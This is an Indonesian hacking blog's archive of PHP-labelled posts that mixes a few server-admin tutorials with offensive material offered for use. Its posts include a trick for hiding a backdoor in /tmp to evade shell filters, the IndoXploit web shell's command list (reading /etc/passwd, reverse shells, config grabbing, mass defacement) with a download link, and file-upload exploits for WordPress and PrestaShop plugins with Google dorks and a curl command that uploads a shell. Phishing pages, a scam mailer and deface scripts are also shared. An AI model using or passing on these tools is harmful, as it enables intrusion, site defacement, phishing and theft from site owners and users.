Codes Xploit: PHP
Pages
Showing posts with label PHP. Show all posts
Showing posts with label PHP. Show all posts

Download Terminal Ndasbajul Emulator

 
Aplikasi Ndas Bajul Adalah Aplikasi Terminal Emulator Yang Dimodifikasi Ulang .
Aplikasi Ini Sangat Bermanfaat untuk Memberi Perintah Ke Sistem Android .

Ingis menjadi Hacker Secara Otodidak ? Apk Ini adalah cara yang tepat

Oke Tanpa Basa Basi Lagi Langsung Aja Deh Di Download Aja Aplikasi Nya Disini :


Jika Aplikasi Sedikit Membingungkan , Silahkan Berkomentar Dan Jika Ingin Melihat Artikel Terbaru Selanjutnya Silahkan Subscribe . 

Xampp Aplikasi Localhost untuk Linux atau Windows

 

 Xampp

kali ini gue mau sedikit jelasin nih tentang xampp :'v nah berhubung w gk ada imajinasi buat bikin tutor ya udah w post beginian aja :'v mayan nambah ilmu
sedikit penjelasan tentang xampp
Xampp adalah perangkat yang menggabungkan tiga aplikasi kedalam satu paket,yaitu Apache,MySQL,dan PHPMyAdmin,Dengan Xampp pekerjaan anda sangat dimudahkan karena dapat menginstalasi dan mengkonfigurasi ketiga aplikasi tersebut dengan sekaligus dan otomatis.
xampp juga bisa buat localhost :'v ya buat ngetes shell atau explot baru yang ber ekstensi php :'v 















Tertarik ?  Bisa Download dibawah :'v

Download gan

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.

Source: https://pastebin.com/z8WiCv3S

Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Upgrade PHP 5.x ke PHP 7.1 di Ubuntu 14.04

 
Cara Upgrade ke PHP7 di Ubuntu 14.04 - Paket PHP yang tersedia di repository Ubuntu 14.04 adalah PHP 5. Nah, berhubung dukungan keamanan PHP5 sudah berakhir, dan tentunya karena PHP7 menawarkan performa yang lebih baik maka disarankan kalian yang masih memakai PHP5 untuk segera update versi ke PHP7. Di artikel sebelumnya saya menulis bagaimana cara menginstall PHP7 dengan compile from source, nah di tutorial ini saya akan membagikan cara mengupdate ke PHP7 dengan apt-get. Tentunya ini hanya berlaku di distro Ubuntu dan turunannya.
Read More

Compile PHP7 dan Mengaktifkan PHP-FPM di CentOS

 
Pada tutorial kali ini saya akan membahas mengenai cara compile PHP7 dari source codenya, beserta modul PHP-FPM yang nantinya akan digunakan untuk proses pada Nginx. Kenapa gak langsung install paket dari repository saja? Itu juga bisa, namun adakalanya kita memilih untuk menginstall dari source karena kita bisa memilih sendiri amna paket atau modul yang ingin dicompile dan mana yang tidak. Jadi tidak terlalu buang buang space.
Read More

IndoXploit Shell First Edition [ V.3 ]

 
Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

Menampilkan Number of Queries dan Page Load Time di WordPress

 
Menampilkan Number of Queries dan Page Load Time di WordPress - Kali ini saya akan membagikan artikel tentang bagaimana cara menampilkan jumlah queries pada CMS WordPress. Barangkali diantara kalian ada yang pernah mengunjungi situs ber-cms WordPress yang menampilkan jumpah queries di footernya dan penasaran bagaimana cara menampilkan Number of Queries seperti itu.
Read More

Mengaktifkan Opcache di Ubuntu dengan Nginx dan PHP-FPM

 
Nginx menawarkan performa lebih baik sebagai webserver karena lebih ringan dan di sisi keamanan pun lebih baik. jadi tidak heran banyak web web besar lebih memilih Nginx daripada Apache. Pada tutorial kali ini saya akan menjelaskan bagaimana mengaktifkan Opcache yangmana ini akan meningkatkan kecepatan loading halaman web pada server Nginx kalian.
Read More

Konfigurasi HTML Pada Framework Laravel 5

 
Bagi pengguna baru Framework Laravel yang baru menggunakan laravel 4 kemudian beralih ke Laravel 5 mungkin akan menemui sedikit kendala ketika memanggil menggunakan syntax HTML. Ini karena Laravel 5 tidak secara default include HTML. Sehingga kita perlu melakukan beberapa kunfigurasi terlebih dahulu sebelum menggunakannya.
Read More

PHP Mirror Deface Full

 
PHP Mirror Deface Full
Assalamualaikum wr wb
Morning Guys Fans" ku cinta , semoga kalian sehat selalu , di panjangkan rezekinya , Aamiin :)
Ok Bosku ini penampakkan sosok kaca idaman Defacer wkwkkw :v
Baca Artikel Sebelummnya : Mirror Script Keren , Simple
Tutor ? Upload saja ke hosting , jangan bilang u kere Gk bisa beli cpanel ea :v


Thx Bos ku :* , Mirror Script Deface , PHP Mirror Deface , free script mirror deface

Script Phising Clash Royale Select Card

 
CR Hacking !!!
Yo, ketemu dengan w yang sangat tamvan dan gans tq :*
males w ngetik panjang panjang gak ada kata" wkwkwkkw :v

Script Phising Clash Royale Select Card

Review 1 CR Select Card
 jika lo pada gak mau ketinggalan post dari kami silahkan isi gmail kalian di bawah untuk mendapatkan info dari kami thx ya :)

Script Phising Instagram Versi Auto Followers

 
Script Phising Instagram Versi Auto Followers
Yups, kembali lagi :) sekarang w share dapat dari blog sebelah yah mungkin kalian yang mau menjahillin teman :v atau gimana gitu :v langsung aja kita comot :)

 Script Phising Instagram Versi Auto Followers

Grub Kami : 

Con7ext Web Shell

 
Con7ext Web Shell
Con7ext Web Shell
 Download -> Download
Buatan sih RINTO -> SHUN :)
LOG ? No
Error ? Contact Yg buat lah :v
Gambar Burem ? emng dari sono :v
Salian Add FB w : M Daffa Najwan  
Family Attack Cyber -> GRUP Facebook
 

Massive Grab Website From IP

 

Sebenernya ini udah lama gw buat.
Tapi baru gw share.

Tool ini gw buat pas lagi maen webdav.
Biar gampang reverse ip range.

grgr tool ini, gw dapet 2000+ website dengan teknik webdav -> reverse ip.

thx Enjang a.k.a magelang6etar yang udah ngasih inspirasi

Cara kerja tool ini cukup simple.
Looping menggunakan for abis itu ambil datanya.

Misalnya IP yang kita masukin ialah
31.170.164

nanti tool ini akan ambil website dari 31.170.164.1 sampe 31.170.164.254
kelebihannya bisa grab langsung dari 1 ke 254.
kekurangannya cuma 3 domain dalam 1 IP.

Script: http://pastebin.com/XRLMJ0P8
Video: https://youtu.be/KOzvl9SlUBY


cmiiw
*nb: Jangan sering2 gunain dalam 1 waktu, cos ada limitnya karena kita request ke websitenya begitu banyak, kita dikira ddos
**nb: maksimal cuma grab 3 domain dalam 1 IP. kalo udah punya akunnya mungkin maksimal 5.

Anonymous Mailer

 
Malam :). Ok kali ini gw share SC Mailer bagi yang suka main scampage atau phising :v
Cara menggunakan ? Upload Hosting your , buka , Hajar Send Send :v
Langsung hajar Para Mastah :) -> Get Here :) Isi Script
Jangan lupa donasi ya :v bagi" Rezeki lah hasil carding toh hehehe :v
TAG : anonymous mailler , mailler free , mailler script , anonymous simple mailer, free mailler , fast mailer

PHPMailer 5.2.18 Remote Code Execution

 
Baru baru ini ditemukan kerentanan pada PHPMailer yang memungkinkan attacker mendapatkan akses ke server melalui Remote Code Execution (RCE). PHPMailer sendiri merupakan salah satu library open source PHP populer untuk mengirim email. Dan saat ini sudah tercatat sudah digunakan oleh lebih dari 9 juta user di seluruh dunia.
Read More

Phising Instagram True Login 2016 New !

 
Free Script Instagram True Login :)
Thx To SC :* Cr1p Blogspot .onion :*
Demo ? Cek sini -_- http://piijakarta.org/igg.php
Download :/ Bayar :* Wkwkwkk Canda lah Click disini Download Here

Prestashop Module Blocktestimonial File Upload

 

[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )


Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya
Oke Sekian dulu, happy hacking :D
NB: Sumber tertera diatas


Script Deface Family Attack Cyber

 
Script Deface Family Attack Cyber
Hallo , kemaren banyak yang minta script deface yudh saya share aja nich script. Kita ramaikan script ini hahahaha
Untuk Tutorial kalian bisa liat di Label kanan , web hacking
selamat mencoba ya :) selamat deface
Dowload Script
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.